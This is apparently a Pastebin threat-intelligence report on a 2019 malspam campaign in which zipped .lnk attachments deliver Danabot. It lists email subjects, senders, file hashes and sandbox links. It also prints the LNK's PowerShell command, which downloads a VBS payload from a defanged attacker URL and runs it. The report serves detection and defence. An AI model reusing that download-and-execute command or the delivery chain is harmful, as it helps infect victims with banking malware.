SHARE
TWEET

2019-04-19 - malspam pushing Danabot

malware_traffic Apr 19th, 2019 705 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. 2019-04-19 - MALSPAM WITH ATTACHED ARCHIVES CONTINING .LNK FILES PUSHING DANABOT
  2.  
  3. CHAIN OF EVENTS:
  4.  
  5. Email --> Attached zip archive --> Extracted .lnk file --> 1.5 MB VBS retrieved from business4good[.]eu/hren.php --> 481 kB Danabot EXE created by VBS file
  6.  
  7. $ grep Subject *.eml
  8. 2014-04-19-malspam-0228-UTC.eml:Subject: Inner City CRR Network Meeting
  9. 2014-04-19-malspam-0232a-UTC.eml:Subject: Inner City CRR Network Meeting
  10. 2014-04-19-malspam-0232b-UTC.eml:Subject: Inner City CRR Network Meeting
  11. 2014-04-19-malspam-0238-UTC.eml:Subject: Inner City CRR Network Meeting
  12. 2014-04-19-malspam-0241-UTC.eml:Subject: Inner City CRR Network Meeting
  13. 2014-04-19-malspam-0251-UTC.eml:Subject: Inner City CRR Network Meeting
  14. 2014-04-19-malspam-0256-UTC.eml:Subject: Inner City CRR Network Meeting
  15. 2014-04-19-malspam-0503-UTC.eml:Subject: Inner City CRR Network Meeting
  16.  
  17. $ grep From: *.eml
  18. 2014-04-19-malspam-0228-UTC.eml:From: Betty Wellman <7e754@3bc73.com>
  19. 2014-04-19-malspam-0232a-UTC.eml:From: "Ravizee, Monica" <8f863d34@c5447.edu>
  20. 2014-04-19-malspam-0232b-UTC.eml:From: "Duffy, Kasey" <4ef33a@ea98e70.edu>
  21. 2014-04-19-malspam-0238-UTC.eml:From: <62a@4c90fe.com>
  22. 2014-04-19-malspam-0241-UTC.eml:From: Sahnly Phan-Chan Pha0194 <d3325d5@13c5aa11886a3a316e42d.au>
  23. 2014-04-19-malspam-0251-UTC.eml:From: =?utf-8?B?2YfZitmB2KfYoSDZhdit2YXYryDYs9i52K8g2KfZhNi02KjZitio?=
  24. 2014-04-19-malspam-0256-UTC.eml:From: =?utf-8?B?2LPYp9ix2Kkg2LnYqNiv2KfZhNmF2K3Ys9mGINmF2K3ZhdivINi52KjYr9in?=
  25. 2014-04-19-malspam-0503-UTC.eml:From: =?utf-8?B?2YfZitmB2KfYoSDZhdit2YXYryDYs9i52K8g2KfZhNi02KjZitio?=
  26.  
  27. $ grep filename= *.eml
  28. 2014-04-19-malspam-0228-UTC.eml:Content-Disposition: attachment; filename="nMeeert19583.zip"; size=28635;
  29. 2014-04-19-malspam-0232a-UTC.eml:Content-Disposition: attachment; filename="nMeeert78598.zip"; size=27866;
  30. 2014-04-19-malspam-0232b-UTC.eml:Content-Disposition: attachment; filename="nMeeert55514.zip"; size=30056;
  31. 2014-04-19-malspam-0238-UTC.eml:Content-Disposition: attachment; filename="nMeeert91228.zip"; size=21880;
  32. 2014-04-19-malspam-0241-UTC.eml:Content-Disposition: attachment; filename="nMeeert47131.zip"; size=26269;
  33. 2014-04-19-malspam-0251-UTC.eml:Content-Disposition: attachment; filename="nMeeert74116.zip"; size=27517;
  34. 2014-04-19-malspam-0256-UTC.eml:Content-Disposition: attachment; filename="nMeeert9433.zip"; size=25205;
  35. 2014-04-19-malspam-0503-UTC.eml:Content-Disposition: attachment; filename="nMeeert30458.zip"; size=28133;
  36.  
  37. $ shasum -a 256 *.eml
  38. 085d0045e93c59ba8fcbac06f09caa3cf63c5b37353f6722600c6faa167940dc  2014-04-19-malspam-0228-UTC.eml
  39. 1cd2b8a8e7519e7902601230df061fffc8c1a033e0a3d6dadbc20b258b46c017  2014-04-19-malspam-0232a-UTC.eml
  40. 5914536c8da0feedb01ce78114b99d8d23b074a28c291588673587eca62d64a1  2014-04-19-malspam-0232b-UTC.eml
  41. 0f5f3b6023557c3480ed28cbcadbaf426969ef83f297d30bcd796ea03b22bc23  2014-04-19-malspam-0238-UTC.eml
  42. 9604d0cc7b98b56cd7b811e2cde91172ad7187d88a3df075b616e00bfe743f8c  2014-04-19-malspam-0241-UTC.eml
  43. f314783a04bf0bf69d69baf55d79248f731580fe1ccf5c4773edea48141dcdf4  2014-04-19-malspam-0251-UTC.eml
  44. 722b896aee101545a83b45f751d9c111d81be1f9d45a0d9520c18ead40a2c38b  2014-04-19-malspam-0256-UTC.eml
  45. 15019b15348aeabffc81af614378900e87e455bd5538e6c4e4d7430b59e5f4db  2014-04-19-malspam-0503-UTC.eml
  46.  
  47. $ shasum -a 256 *.zip
  48. 1b214e8fb5ee2561d7dc32ae6075b9d984e55968fcec453d7c0d69591adde724  nMeeert19583.zip
  49. e0abcda09bdf517bfebfc26a8f12bbf3202e709ef8a4a23383e9900bc6077c67  nMeeert30458.zip
  50. e55458aac38ef9bd06e5e82c90c369f4ed89e0fa599f703271ec3f6ab9638011  nMeeert47131.zip
  51. eeba8af15905e1f00ae45720998ff6fd4e4d2124672b78fdd72de67dcaae4c93  nMeeert55514.zip
  52. 3cd388ddd9a45a0eb5e2defb5941251d8b44ba9fe88ef30306fe00629af7ac17  nMeeert74116.zip
  53. 6b962a63f26cfbe6fba89f58522ee99e63e1e655f477cb58d6411ad991e813f2  nMeeert78598.zip
  54. e29af015c6df4b291d90591100cd6c63c21f8ed7218d596ea8ab4af7dad919dc  nMeeert91228.zip
  55. ed1beff140614fc40d72d665baf1ff1b1bd9e75705e4f8583a22a0116b2dbf76  nMeeert9433.zip
  56.  
  57. $ shasum -a 256 *.lnk
  58. b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d  nMeeert19583.lnk
  59. b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d  nMeeert30458.lnk
  60. b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d  nMeeert47131.lnk
  61. b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d  nMeeert55514.lnk
  62. b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d  nMeeert74116.lnk
  63. b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d  nMeeert78598.lnk
  64. b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d  nMeeert91228.lnk
  65. b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d  nMeeert9433.lnk
  66.  
  67. SHORTCUT FROM .LNK FILE:
  68.  
  69. C:\Windows\System32\cmd.exe /c @echo off&powershell -command Invoke-WebRequest "hxxp://business4good[.]eu/hren.php" -OutFile "%tmp%\tmp856845.vbs"; start-process %tmp%\tmp856845
  70.  
  71. ASSOCIATED MALWARE:
  72.  
  73. SHA256 hash: f2d51add5d58d4712d9e024f1e9bdb0f6d4955a749b6a09972344dfd778b8ca4
  74. File size: 1,544,171 bytes
  75. File location: hxxp://business4good[.]eu/hren.php
  76. File location: C:\Users\[username]\AppData\Local\Temp\tmp856845.vbs
  77. File description: Initial VBS file downloaded after double-clicking extracted LNK file.
  78. Any.Run analysis: https://app.any.run/tasks/353a979f-df1c-4512-9c71-f1e77ad14ae5
  79.  
  80. SHA256 hash: 9f98291702605aed9e61085a4e9d4e83cfe0942757542487fd36da92cdbd48e9
  81. File size: 480,768 bytes
  82. File location: C:\Users\[username]\AppData\Local\Temp\tOIRccbdGFRn.dllMvVviGEN
  83. File description: Danabot EXE created by the above VBS file
  84. Any.Run analysis: https://app.any.run/tasks/a6ebc434-3cdc-4aa2-8665-6a984fbfc727
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top